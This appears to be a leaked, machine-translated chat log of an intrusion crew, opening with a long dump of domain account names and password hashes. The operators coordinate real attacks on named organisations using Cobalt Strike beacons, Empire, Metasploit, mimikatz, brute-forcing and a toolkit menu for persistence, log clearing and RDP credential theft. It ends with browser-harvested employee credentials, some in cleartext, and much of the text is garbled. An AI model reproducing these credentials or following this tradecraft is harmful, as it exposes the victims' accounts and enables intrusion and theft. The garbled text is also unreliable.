HQ199$ 0836a33445851bcdc0378505403f72fc 4096 5681 HQ239$ 86a324202574d4d1d52088e317081271 4096 4223 HQ193$ e844c8b07b6bb2b66dbdce4792990825 4096 6146 HQ267$ b7521c6f10d9140011662761cfbfaa92 4098 5721 HQ263$ e1736bc430290de94c38d62322dc3731 4098 4253 HQ218$ ba1b9aad47589af0bed56e4c42ecec00 4098 3930 HQ225$ 1e8bfef00b16c4eb18337dfc1ffd4691 4098 5670 HQ234$ be438598d72404076e05b3154d75f814f4 4098 3925 HQ219$ 
f37b649994994912fde728f9bb33b195a19 4098 6126 HQ243$ ad3d9d8d0e33652f8f8a7a49a4946a22 4098 6152 HQ271$ b2572bbcb601aad27763ad53755b4c7c 4098 6163 HQ281$ 502249f258905f755079a6e954c6beb9 4098 6166 HQ285$ 69121ca579a75b76238ab16b9b6d5a8f 4098 6168 HQ291$ 59963e0afd783fafdf7228c94beda85b 4098 4159 HQ107WORK$ f7501144a4eb8cb65d647161c2786d90 4096 5798 MCTEST b58b38a0038bfa92d22a5d8d06c51f45 66048 5673 HQ238$ 3e74a9ce0dc572a227c3eff34a093a21 4096 5728 HQT009$ 454dfbce440c92e162c9b49df65a0fed 4096 4197 HQ156$ f3b66b6a7729b159e99632095652ae8a 4096 5722 HQT008$ d345fb1b81290ab918df4f48753cba9f 4096 1974 DemoUser 95197f192c3878bd20d92d19a1e06d14 66050 5754 HQ286$ 4d72e65e9a02a9932a3ec49c5da21e59 4096 6189 KPNWH011$ 0fb8b8c233f5638348d590da0240748c 4096 5807 YolandaGomez 09b24c3afe78be3d47d2a44953d3ca20 66050 5802 SoniaChen b78b06f140877bd735115e18eda0c522 66050 5804 JamesYoo 6531d27c4430bd65fe56640647ff41f6 66050 5803 KayleeSeong 515dcbd556ef06fc3d75ac2c49af394e 66050 5806 KennethKim 788d511092eab1b20b5d3e492267cd33 66050 5738 HQ277$ 8b249236f26194c46fe218b9b1603615 4096 5878 hqmac057$ b6918631d07ab98a8dcccb263747933c 4096 4168 HQ119$ 77ee5d2a712e4c88122eead4538fe976 4096 4181 HQ137$ e2330552c16213b62717e4f679535cce 4096 6182 hqmac001$ 4f967b21fd2348237a5e89db0ffb9dd4 4096 6149 BARTENDER1$ b3c5ed5fb9f2c9b1dafdf4b3d9f601f5 4096 5849 HQ309$ 66fbbf666b0fa452e77e89efa038b0d4 4096 6191 hqmac047$ 0d94f798c257a5f957c6c850dfe9f4ca 4096 5717 HQ260$ d00a4dfb9f0051471eddb07a04f79419 4096 3891 HQ194$ 9326303b9291d7185e50ac32e94f0b8b 4096 6115 hqmac026$ 6fb614c51682ccaff204f71e6b8ba61f 4096 3920 hqmac012$ 9c440385810cc3f1405a50455d2c9ed4 4096 4200 HQ161$ d5e51307755a499a223bec575648b966 4096 5833 KPNWH002$ dbd21897d282b5be82892c4233554937 4096 4218 HQ186$ 04708bbc4fad81334587636b7732bc47 4096 5881 KPNWH005$ ad368370e8d93c7b8352c511ffd5cd4f 4096 5749 HQ283$ bb8fae1c35517e61bfe7794c3a24c94f 4096 6193 hqmac051$ 69fc114100945750b5a4b2255e7d1f08 4096 6172 HQ295$ 
58e8b9be412b4edd547bc1e81bc43930 4096 5900 JennyKim bacf032fa0507f214011a998419c8a24 66050 4157 HQ103$ fd83429a7e16b9e00c881c47a57e0570 4096 5732 RubenAjanel 4b60ff7da6911175b03d52ebbad61ea1 66048 3798 Aditiya ff2206f7cce075f4b94c240f84fa87b5 66050 5700 AllisonHatley 28e329b7b2e6440e0442d30018887ec1 66050 5780 AndymKim 8af86b862e4b3e5b282cd728eca955e9 66050 3770 BenjaminYoo c87f1395d52d498509ad9a81cbeb66c9 66050 1194 CarmenBautista 20f823a52f52886c24ff17ec24863c70 66050 3738 CaseyYoon a2743599d8de5c04ae19c8d5b06e00d4 66050 5887 CrystalHa 4e30d11b09201b1d2a4e3ffec8ec1356 66050 5779 DarenaYee 15d6b89b012240193b0f864bfd557dc6 66050 5626 DarinUnke d6d82f080ad59b30184f48b7319e9c7c 66050 3752 DianeLee 8524f0ddda8ad90716cbec4a43eabfa5 66050 5861 edwardvillaflor 6991452b1e1109cec321597551c5aa46 66050 1469 HannahLee 5fe5b315023fc58559ced8c62193d721 66050 5891 HannaRoe 109026de4d387bab6788f1e3fa947329 66050 3722 IvanFranco 0644b58b4e4cebb1eb7948640188386b 66050 3903 JamieChu 10f2774f0fee32179fb5c72d18d90f27 66050 1182 JasonYi cc6e7ed41bee7252216c5e00177c6dce 66050 3796 JenniferKo cf82c20d8b916740536f231bf89176e4 66050 5862 JenniferLu 055b2f2830ac22e3adbdd0aba8032a6a 66050 5845 JoyJo 8a386750cb7f79b293e74c7dcbb985f0 66050 2051 KirstenLee 2ca7f19c77b6dba33d03c9ea83ce77ee 66050 5813 KPNWH f2881c89b8d79e078cc6fe323cd1f5c6 66050 3851 KyeongKim 6b1d99b1a8f8787495034147364ad8af 66050 5882 MarianaFe 97746f1f22b7626f4b39a150f1237cd7 66050 5825 MollyPoer 10a62127dbbf80ecca2bbd326c7afd4d 66050 5814 PriscillaW 53bf2d1072aeabe7bacd02f5dbf0242b 66050 5884 RachelleRoh a9c592e5bfed559620db2747fe12e0df 66050 3804 SarahBrown dadc931ee4418fe09290f5fcfa7a31e6 66050 2274 SherryRobinson 2504f4ed1bef329ad1a82be522ef9d8b 66050 5778 TammyLee 2579ab1f944482c42e3bfa86025b3781 66050 5810 TerryJung 3893cfeb41316e3236fc24e6b19a7b88 66050 3893 TysonRoberts 5c85c652cbe3a5d07e5cceee06ff648f 66048 5704 hqmac029s-mac-p$ cb9c71b8a8ca5dadc08a67bd48a44ddb 4096 5839 CaseyKim c86a193b217c2bb3e2a709cd3eed8bef 66048 
6214 hqmac055$ 14d988005fffc670ecaa4bc2155a7819 4096 5916 EileenAhn 4fdc363f603e2da46f2dac25e0452dfb 66048 6144 hqmac036$ aba4d8780a601a8d96018bd83bfbc3 4096 5724 AnaLerner fd74c2d41744ec69627ccda78c24045d 66048 5906 LaurenYi e302fcdf9cfa1aa396911b17af72b7c5 66048 1170 HyeRChung 26f9e6b2b0a2f3cdd26c6c82f3576b1f 66048 5706 HQ252$ cebe173dab5366f8f5e5e7734c6a2485 4096 5645 hqmac023$ 92885ccdc650bfe1a1c8cf8be3688553 4096 5838 hqmaq049$ 2b2e8eb7de8c32f5cedd5ce611ef64 4096 5856 SoohyeonJu 87147bb3f58ac1f730a82e1e80704202 66048 5855 KristineLee 5769997bc24d4d0b6c3f3d2a24ed99ed 66050 3869 AimielCruz bc1d46b20def74cd03e9fc377c23860c 66050 5705 GigiMo bf7b867d02f4643d4de0fa236e2b5aba 66050 3831 EricYoo 092ab18778a5b24107764b2935fb84f1 66050 5877 AmyChrest 13d7af5dadffbf56b1ba688e9ade9c6fd 66050 3843 SherryKim 206f576f7f34d314c59c3c79c880098a 66050 3850 RobynEden fe3e34132f1820532c8454a114d3c237 66050 5876 BrisaFrench 02a756cbbc986e925720f5f0abfc49ac 66050 5746 AyumiS 5f693a08dcaabaacab2a9941178edc8c 66050 5846 BerryRoe f4c7746bcf5217b446b4b24cbc7cb9f8 66048 5708 RochelleC a4f4550e65082f42dc43557b05fef714 66048 5685 KatrinaLam 6ebb1ee9dfcf841c74f08efb91288a44 66050 5867 MaySeo 3c1fb10039c8249583ee285277ea7149 66048 5761 SaraLin b202b49eeb32b6d32a70c9d404c07758 66050 5646 IanWilliams 51b684079799f9b9cf97ec0628a129ab 66050 5621 MKIM cc58f2d3ab17b7510bc2c69738be2a62 66050 5653 ChristineWang 7de678c6e3d53bb203b3f616d4ac3469 66050 3880 DannyKim c45e98e65a5308ad802d17b47b21b5b4 66050 3884 ArmidaTenorio 6abd12f3155f8c8dc88e7952f4bdf767 66050 5707 CynthiaCeballos 84ea8f5bfdbb81e08ac23a4c090e399d 66048 5631 BrookeLamb ea8ed05bba630cb348831db253c9f533 66050 5618 DianeJoo 107831efd32c15e9055a67328be8178 66050 5823 JulietKim 899c8f6cc0acd27da61e1de00a572d06 66050 5691 ColbyCochran 752b0dd44fc8ad88f029ee634b22ec11 66050 5851 JulieAhn 0c35bd92e8e949d72b87dfdbf7b91f34 66050 5665 CynthiaLe bd4e7e36fee6058d3da5dc94e726d354 66050 5847 JiJiPark 4c8e2ef2ec82cdd48c87ea7c9dba6578c 66050 4243 
MichelleKim dd42d76c4f23ce1568269e50ef19f99c 66050 5769 CandiMendoza f3eb87ad697f1255ac8f8828cf32010b 66050 3894 EstherYang 0cc102edc0751a912c7357fea84b723f 66050 5864 RianneLee 4a2e10be4cfe8b16ee4f1203a9fd50b0 66050 5619 DonabelDacumos eebad80e60bdf026b3e22825f75ffad1 66050 5873 MoisesRivera ba498a5d108d652a0b28ccbd8fa433ac 66048 5763 AdrianaNajera 64adf3f2840e0e97c24052fa3fd69b54 66048 5692 PabloJuan 476ef9d2552e0b988193c7606dbf3321 66050 5874 SoniaAlcantar 159387d789654c9d86afbe5534a9b8d6 66050 5840 AsukaInoshita b33874cc598428c5355de75899330406 66050 5777 AmberTrillo a55b47cf346cb8180c94beb022768970 66050 5666 LauraChun 84e26f7fefcf961d06ded608d2d0cdde 66050 5901 HannaKim c8b8252b646fd217fec981b459c8d1fd 66048 3867 StacyChong 2af8c710f387152783e3dddbcd9919f8 66050 5826 CorinaLopez cdd757a09c8a94c9e9afc4a4d0d8f86a 66050 5879 OliviaSon 7b399e87e116d447a0474e6b8e3f90b2 66050 5772 MarimoNakamura aa564997d2ec6a562f43d23d61da8f72 66050 5737 KellyKrapf d6084685870c70d38bcc7cb808c5eb55 66050 5765 LisaCano 343e018ee7d036929deecd17e6eb9201 66050 3861 KathyBuri c3aab25918933f4c31588482ca1ce8da8 66050 5751 TeddyLee 8b5ef5b285944b140367c759a70b12b5 66050 3833 JPAntonio 3eda63fd4bf28ba37b061fff4f3ea25b 66050 5768 MichelleHughes 7a353222568c31750ddf263dcb60717f 66050 5801 EuniceSung 0771d3292bdb8226956709118b758f2e 66048 5844 BrittanyLee 0ebffbba2bfe6fc460bf1cd574a4f44f 66048 5635 hqmac020$ 2c62f2e09f34d1c08952df71c50ae552 4096 5693 hqmac024$ 3a6e6e39d531690a3f119c75c552968a 4096 5917 HyeMinLee 7b6fe95a8f84ed4cf4d32ad70fbb4587 66048 5854 HollyHong c61d6b3f77c2b4855812fcd8630ef5fd 66048 3653 YoungPark 6e0e7aa9c00527b0fa1bbd6d0cd98fd0 66048 6194 HQ310$ a71e5bdfaf4a80d93bdd3386a022de3e 4096 5834 KPNWH008$ a5d299ff2966dc2d5a0d56a0bb2c383d 4096 5726 HQ264$ 9d7dd5edd4a8efeb03c2e23aad43b63a 4096 6150 HQ269$ 656216e0054218e902a474bd7155e285 4096 4174 HQ127$ 03a49b6dccbc1dd7ebbc700839c99e9eb 4096 5905 KaylaShin 4ded1802b3eb1aa7a4b9a6377fc321b5 66048 3763 EstherPark 
4e007b54f6c36065e3201ecbe986209e 66050 5836 KPNWH022$ 050351e2cb1c757ee2656de8a9429628 4096 3740 YahneseGriffin ec3f0f20a6578b3baeffac643e00887d 66048 5902 BrittanyB fcbced07ee40a75906c5094bbd415df3 66048 5770 StephanieRamos c48ae90c892a82790b9ba984cfc9f42cb 66048 5843 hqmac052$ 597409290b7cdf031a0959eb6c7047b5 4096 5835 KPNWH016$ 99bcedb53bba0948956aa3c15fbf5854 4096 6192 kpnmac011$ e9aee4bd19cac93d723d107c2491c1c8 4096 5890 GanieHwang 90d282fdbd1ffb7c7ba07e48a967cee4 66048 5668 BrayanSerafin 49ebbb91c81babc7089316a0bfd81133 66048 4228 HQ196$ 3b0acb49688c0d4c19b9e55a1328534c 4096 5775 HQ304$ 132f8612e7c095e040596956e01e4855 4096 6178 HQT012$ 084dfdfc51e8403d969b68ab2972b983 4096 5829 KPNSR002$ ca8cbe530b218315e155ff8e76d4c6f3 4096 3904 HQ203$ 7a88c957bc45cbccfb354bcdd1450aae 4096 3655 LillyKim 423b5d1ef30cd08e4ba545c79adc9323 66048 3927 hqmac014$ e1a5e73161369fec7e5e1408bf295803 4096 5869 ChloeLee 8637cea980695ea8d5c8ac3f5e1da29d 66048 6127 HQT005$ 58a459f3f55527d0532245998d1a9652 4096 3764 JanetteFlores 1af2e1956d0c6405d27912e7d8def701 66048 5907 JinYoungKim ba3dfb7e94110778ee0dccc2546423af 66048 5875 AliciaHwang 48bb75a2109064b5f558eedbef042f1a 66048 6171 HQ294$ f1318b15a580a08df95b7bb4fde038c3 4096 3832 HQ158$ 5967271268cbedf66eb4cacf7ed527f9 4096 5742 MarbelSerafin ab12067db2517fb01b3c9fbe1421b6b7 66048 3801 JillianHong 02f266f0a3a3d362391a4c441e129b89 66048 3824 HQ151$ 64d5675d0c401c336cc013ecf13c8551 4096 1778 wh 82ea11ee5c73ebdc9bb4fde2b12df244 66048 6205 HQ315$ 3254d8470d844fa5eec4aedce35d4623 4096 5926 BrittanyLovell 6e30ee1c49ceb27edcf853499f50b25e 66048 5947 LeslyPlancarte 35332e7fb780cf30fbfc29cba93d7bf2 66048 4160 HQ109$ fdb7ca77f3106f6fdb55b4abcb47ea39 4096 4204 HQ164$ 61dffd7bef7d4844eefc6725dff50e40 4096 4176 HQ133$ 61b501c8e80442e73ff80b99721a0e58 4096 1178 TonyPak 1c3241f96515b83f74e7a277ea956532 66048 5915 JenniferChoi 68fee161b32334b8c4d69501cf8a5414 66048 5920 AhramRyu 490cf9ded21774c424116348f2215916 66048 1258 PaulOh 
788b3648d74e26a7d0957ab9090f6f9a 66048 5739 GloriaHernandez ad6519dd6264b8cd233b9170956bde84 66048 5696 HQ245$ ae21c627f742c13bf010646370741592 4096 6223 hqmac066$ 3d7da7ac657a23f41d99624738978568 4096 5925 HyePark 7581ef7f434a6e75db6c7d5ec13b240c 66048 5934 AshleyChoi 678756df085a482b6dc37d3d1716cc6e 66048 1220 TimKim e0583b06baa1f40f58b6cd0c858b304b 66048 5725 SofiaSuk 8095fdaff069e7529f5d151a3304feaa 66048 5893 JulyPark 732318e15172095f7ff6fd71e2b42465 66048 5910 AriaChoe 28d670b0d2f5778c72056689f0722396 66048 5945 hqmac064$ a25e890b4d676a2631de0966235656dd 4096 5924 YoungSeo 7211ae4e73a2ebadb6abf53342cc5d10 66048 6176 HQ301$ 9acda185c7366c9f778d3be298ea601f 4096 5719 HQ261$ 98fccfa82c308baeddee8ab56c5c6b3b 4096 6199 HQ314$ 232218af45baec7a05f04c7013dbe02b 4096 5718 DarleneYoung 90ef8ad2330b735b0ee2d679fd409fc9 66048 5918 RosePark 54ceac79513faf8b8c49c255eebfca2e 66048 5747 hqmac042$ fa801a973cd68e1465340e35d1183d18 4096 5860 HanLee 6787dc7c99c6ff77e17a29e1ae5df15b 66048 6156 hqmac040$ e8e76e4080c49b5be3284377ceb0f776 4096 5964 HannahChoi 1df148b29b41024c47fe7a579eba36eb 66048 6196 hqmac054$ 8e78768d957fd8332ba37dafc4a028b9 4096 6157 HQ274$ a194161c5d36454ae0c65d44ba450ed9 4096 5632 hqmac013$ 8871078b7ad26ab2687db783e45ad7a1 4096 5620 hqmac007$ 36e96c68976f9fe8f0f5400f7d4153fd 4096 5931 ChloeSLee 45735e1130c3ffbb7a93eb4bfa9da31c 66048 3881 LoisLee eecd7b8fcc873bcaab511637c6744ac5 66048 3922 hqmac009$ 5a635d3a51aa761dca80f74be571e637 4096 3879 SaralynLoeur 35534e1a493d11d2f0cfc96bd4fb2e6d 66048 5745 HQ278$ abd7bfd0e512f1ff76eeda3af0c06920 4096 5944 RobinBae 4691a2c87c12edcd0d1bbf90964c8e66 66048 5858 HQ324$ 61cf9d70faeb9653ebaffecfc5277f04 4096 3686 AndyCha 115f4ef32315d242abe6351fff681ec8 66048 1226 TomJeon e4aded47f1af2a92a3807e7bf70dcf74 66048 3749 HQ033$ 81701208a469a697c90810f8cb9e2c90 4096 5762 AmandaSun cba0e67baeba56702b742b82d358c9d1 66048 6143 hqmac035$ 04a761dbb7e893fd334a5e9f651681a0 4096 5865 YadiraEspinosa f537f1445562dd8587d1c8b69409871c 66048 5974 
No session? for now yes, @tl1 will now see what can be run while @tl1 @tl2 We have all sessions down - help the second team?
user9 gave out @user1 @user3 dedicates, still separately give out something useful or not ? https://gist.github.com/HarmJ0y/dc379107cfb4aa7ef5c3ecbac0133a02 ehhhh, none of the passwords worked (

Write a brief report in general, what have you done here, what are you going to, what data obtained is a local admin too ?:space_invader:niVisitedvcm?) old session is theresession is gone? and config, dai look around on their workstationsany VPN, you can look in the admin users who are in VPN / Remote groups or suchlike if they are there will be an additional task: find a VPN, not necessarily open all the pc in a row in the cob, you can through net use look fs, or under the token YES (accesses above)1.done.missme.comokaido arms by the way does not immediately get to the rest? have all the servers checked?
machines - 344 of them servers - 10 (9 alive 1 unavailable) vindexed armies - 256 (49 alive) 53 balls mashed `5311`

there is no need to write or discuss yourself immediately tell me the strategy to work well and let's count on it all servaks are real - virtualization is not toned down like only outlook and poppy backyatmalovato servers however) stat at the moment cars - 344 of them servers - 10 (9 alive 1 unavailable) armors on the wind - 256 (now otpiguyut and opisu how many available)

user9 user4 user3 if it does not work @tl2 said not to mess with appleslashtormg well korbel now close and ask the guys to help, if something is missing I have not so much clears, have tried with hash passwords?all yes and all the LA from the servers tried brutal passwords yes to the account Admin? without domain@tl2 can try to brutalize accounts yes there? on vg nothing (no? Good night, get it? ok tomorrow a lot of work, maybe we will close from scratchKopalal cpcc.edu no result. I have set up a vps, tomorrow I will bring everything up. I searched all over my surfboard and did not find any files and folders and just in case I had to roll out the os again.Pinged all that is pinged from the AD and scanned the balls on the pinged machines (in the conf. skipped). Coba and empire sessions don't go up. i have already got the kit ready and wanted to try it then psh empire`https://ucfapps.cloud.com/citrix/storeweb/`. it worked in it, the data does not get everything, no way to run the exe, in ptsh only managed to pull the server, and that with its own fuck ups, in the coba is not pulled, I think about how to separate further, tomorrow I will try something else?
2 vps configured completely according to the list 3 now in progress, here is the final stage, the empire is in conflict made a template guide on how to configure 1 wpc given to @user3 1 is ready to be given away 1 will soon be ready to be given upafter tomorrow I expect you at 12:00 a.m. in 12 minutes at homewrite me the result of your work todaytake it there msf and psh empirethank you I'll give you 3 debiannaw what do you likecaw@user8 you like lincus? got it this weekend they brought a new one, I will move to it, this began to often hang up another computer? I will now install another computerthere I @user7? @user9 got sick @user3 is late Where is everybody today? Not many of you...then I'll give you a new one. I don't know what to do with this grid. there was also `healthcare.com`, but there, according to your arguments, got burned (nothing ran, no google chrome, no kmd, no psh) in `unf.edu`, worked with it for a while and at one point the citrix credentials have changed, nothing yet? and now what about the tasks?[ ](https://mediaeveryone.com/channel/general?msg=Qdo9AtdEjZuyY5et4) you wrote that I have on my tasks kovyvayu asu.So what do you have on the tasks? and well)yes norms)well, how did you rest? 
inside ad infos, hashes, creds.txt etc

And another thing, since the report will be an archive, next to the ad_*.txt files you make a file creds.txt in which DCs DA EA LA cleartext creds if there are any

If there are any, delete it:

```
include(script_resource("modules/insleep.cna"));
```

```
popup beacon_bottom {
    menu "TW-toolkit" {
        include(script_resource("modules/checkvm.cna"));
        include(script_resource("modules/clearev.cna"));
        include(script_resource("modules/FireWall.cna"));
        include(script_resource("modules/persistence.cna"));
        include(script_resource("modules/RDP.cna"));
        include(script_resource("modules/Win2012mimikatz.cna"));
        include(script_resource("modules/cmd.cna"));
        include(script_resource("modules/sleep.cna"));
        include(script_resource("rdpthief/RdpThief.cna"));
        include(script_resource("modules/collect.cna"));
        include(script_resource("modules/chrome.cna"));
    }
}
```

Only here or only here? Do you in the cobas also arrives? +, one left ... tense for the future, remove this plugin already removes sessions more than 1 minute asphyxiation just servak where YES for a long time or did not go at alla then seshchka offnut and all take a place on any server

```
nitial beacon from SYSTEM *@192.168.1.7 (DC-01)
```

Why the slip? go to the server 1 team yes, already working with him, the second has just configured, accesses are distributed there slip put while I sort the files is mineThis is whose in the general cob?+while we can re-sort what we got and msf to configure)))) it's not even the server? no sessions left at all? + well bnpmedia.com exactly + all fell off? dom.helpathome.com so in total, what is in work now? sort what we got earlier, then the rest are busy?only FRIVER.LOCAL is up and running now?[ ](https://mediaeveryone.com/channel/general?msg=vvBvMwABd6JENGyrv) what domain?
FRIVER.LOCAL-+DIV420-4G350W2 (FRIVER.LOCAL)write down what online remained1minute+failed sessionTell me in sootvetstvennoy conf confine to throw allvatitoki write to confine from where hashine the fact kst that this local user no yuz all easierspawnas jump etc can be from other errors in the process check through net use AHyHax[DIV74P-GVNXHV2]TKennedy/7288|202020Oct07 00:15:59> spawnas .\Administrator Shotgun913 https [*] Tasked beacon to spawn windows/beacon_https/reverse_https (regbest.com:443) as .\Administrator [+] host called home, sent: 261167 bytes [-] could not run C:\WINDOWS\system32\mstsc.exe as .\Administrator: 1326 Kernels look different so it's hashes) ah, I also uploaded kernels and there was also an admin who uploaded hash above...what to whom7 it's to whom? and then commands like this wdigest tspkg kerberos ssp livessp hashdump use mimikatz possible mimik to pullenum_utnand try to remove the module kobaThen the session does not fly in koboltot write while the results of the work in their confumb will be in the hash DAokey) now pour the case and will continue to search) yesEto the fact you pulled the server?well, okay) there is a matter of taste)He mne like my brother, we are with
him from the first version together)))) or something like thatArmitage -View - TableDo it honestly, in arma by default horrible lookkstatistics shot out of turnsuzal msf for smb_login from his computer, will die?if no more local connects you can continue to work operatively)already just a session on the vpc and disconnect it good for you that you have made a breakthroughperfectly make the connection that you have received to pull? on these vpc why? yes you and said that deployed msfnahera i gave vpc under msf? question i drink somethingDo you also pulled on your pc before that?kzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzznmDa through a proxy. We didn't do it any other way. Through armitage did but it needs a session Seriously on your pc pulled or what? I'm through a proxy bindomili real shot? on the VPS? And seriously? Definitely shot on his own pbut do not say that on his pc pulled through?) and for `` For? [*] Meterpreter session 1 opened (0.0.0.0:0 -> 185.150.190.204:2103) at 2020-10-06 23:07:43 +0300 ``I didn't look at it that way, but there are no strange groups))) thanks for the tip at least someone checked it out) no have you checked it out? but in ad users ivan has member_of strage_users and your username DOMAIN\ivan what you have in LA it says DOMAIN\strange_uesser I'm talking to the localgroup Administrators or do you analyze the groups and look for the current user in the list? )))))))) by DOMAIN\uesser how do you determine LA? 
ok if you find something I will throw here in an hour, only in brute force will go to[ ](https://mediaeveryone.com/channel/general?msg=W4apDrxrep52uAxre) nice to hear that) yes-I think the system will soon pass too, right?we don't have any LA inputs from the current live sessions?+I hope everyone heard and all made notes on this point understood, a little later with grandfather check citrixnothing on your pc you do not deploy, do not connect, do not establish a connection, for this you all issued you or very poorly documented, or lazy to look or ask guys stop it if you through yourself sox put, you can and msf sessions to pull on themselves, why vpc gave out rdp, browsers, etc. and i said that i should work on the network through vpc proxies why do we need a winDoc you had a question if you remember everything is ok, i did not hook up I wrote a long time ago you wanted a citrix proxy hook up made in coba do not say that from your PC you go to the network in foxecaca what proxies?I delete files immediately it's because of proxies that I prescribed in the browserAll he develops and chat))) well I read or understand it wrongWhy? He has a rocket chat hung up and he can not respond Well, how can he drop out of the chat and because of this in what question? What exactly he scans through a VPN? And how is it related? he scans for 17-10 mb that will fall out. and @user7 normal? oh, that's the first one I spammed and he just hung up) Dak I dunno) I do not remember that there would be something to do) So I clarify the grid for @user7 and you help him, I just asked whether you left the file or not) and @user7? and I worked there? I do not mind, but it hangs. file or left there? 
strange that you) someone is directly rushing to me))))) ``` 10/06 20:37:31 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 20:38:32 *** initial beacon from abinash.pattnayak@192.168.9.85 (ABINASHP) 10/06 20:39:45 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 20:41:37 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 20:45:43 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 20:49:48 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 20:53:54 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 20:58:00 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 21:02:06 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 21:06:11 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 21:10:17 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 21:14:22 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 21:18:28 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 21:22:34 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 21:26:40 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 21:30:45 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 21:34:51 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 21:38:57 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 21:43:03 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 21:47:09 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 21:51:15 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 21:55:20 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 21:59:26 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 22:03:32 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 22:07:38 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 22:11:43 *** initial beacon 
from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 22:15:49 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 22:19:55 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 22:24:01 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 22:28:07 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 22:32:12 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 22:36:18 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 22:40:25 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 22:44:31 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) 10/06 22:48:36 *** initial beacon from JJones@10.27.42.145 (DIV420-4G350W2) ``I understand that it didn't come back, help user7@user3 didn't get to YES? in process--didn't get up to systems yet? or yes? i say ok or no after startup, you can't start it1 startup and all one time my cob session + start working ``` dom.helpathome.com ``so this dampon did not say what, just said that he broke through svoitom how come back can you ask it? ``kiwi_cms'')) to the toilet where? he went out, do not ask (kiwi? svoitom what method? and all have tried his method?somewhere other than the grid @user3 were the rights systems?[ ](https://mediaeveryone.com/channel/general?msg=ZbXb97rLKmgmCG7Ff) judging by the name of the polzak may well be LA@user3 can help so far others took the session but have not yet checked because the sessions are falling off - looking for a less stable processThis is not enough! there were promises that the fuck it will be no free @user9 @user1 how are you doing? 
within an hour can come back as usual wait an hour there are 2 new sessions in the input cobaFailed skavot and do not see the vpn on and the pc is not in the domain at all how is the connection going to another name?how can I get a hellfind and still not find my machine?.immediately here is the name of the confabdisassembled in the coba came dead and new and then the questions, kerbs and other stuff is the scriptthe first message in the confab - DA, EA, LA, DC, ad infoDo yourself tutorial on "got the first session "What are you talking about?guys, honestly fucked repeating FIRST MESSAGES IN CONFECH SESSION back? in an hour will not arrive will be assigned to a couple on the current you from half an hour to an hour if it comes right away will notify let one of their monitors kobutozhe right, while waiting can help colleagues answer questions ok, while waiting bad (you said there was half a gig of information have you not archived?or there's a piece of AD info left there? what did you manage to remove? @user1 also wait mb will returndalf@user3 yours arrived? well, yes) so we took exactly the server segment and separated from it subsnets /24 /16subsnets not everything speaks the truth) but subsnets `>cn: 172.I have no trusts. is that normal? + now i will download everything and start 2? 3 people so far, what about dll launches?awaiting the groupbos ask yes@tl1 chetu.com i work feedback on dll, yes)give me a name, i will create a confab and give dlltoday i will definitely "live" network)who has a kilometer network, hands and head will not be redundantOkJdu if it does not come will work in parezhdy while you still 20 minutes it fell off do not see that he wrote it off here?I have noSession he hasWhat do you mean not distributed yet? 
Or yesterday's maybe now come[ ](https://mediaeveryone.com/channel/general?msg=qg5eoj5jnJsiEBbcx) catching in the first cobaSad[ ](https://mediaeveryone.com/channel/general?msg=W65dEW3796gimsBqt) means a lot of information)now maybe reopen1 to 1 noThere will be more sessions? the main thing is not too much noise the bigger the network the easier to work in it)fell off ska!@tl1 took ad_users not yet - is this normal grid? @tl1Povisley((((``` --- Chromium Credential (User: jessicak) --- URL : https://mymails.chetu.com/owa/auth.owa Username : jessicak@chetur.com Password : Ll???? --- Chromium Credential (User: jessicak) --- URL : https://mymails.chetu.com/owa/auth.owa Username : jessicak@chetu.com Password : /?X%W??m --- Chromium Credential (User: jessicak) --- URL : https://mail01.chetu.com/owa/auth.owa Username : jessicak@chetu.com Password : ?I36?U? --- Chromium Credential (User: jessicak) --- URL : https://apps.thinkhr.com/ Username : jessicak@chetu.com Password : /?2?P????? --- Chromium Credential (User: jessicak) --- URL : https://login.microsoftonline.com/887b9831-597d-4e43-9f75-9ac91b93a5a7/login Username : jessicak@chetu.com Password : Sweet@8733 --- Chromium Credential (User: jessicak) --- URL : https://app4.trackmytime.com/chetupayroll Username : jessicak Password : Chetu@123 --- Chromium Credential (User: jessicak) --- URL : https://secure.sharefile.com/oauth/authorize Username : et4rs@chetu.com Password : TeamDMoney$7 --- Chromium Credential (User: jessicak) --- URL : https://secure.sharefile.com/oauth/authorize Username : et3rs@chetu.com Password : SolidDeal$9 --- Chromium Credential (User: jessicak) --- URL : https://app.berqun.com/app/dist/login.html Username : Password : HelpTeam1 --- 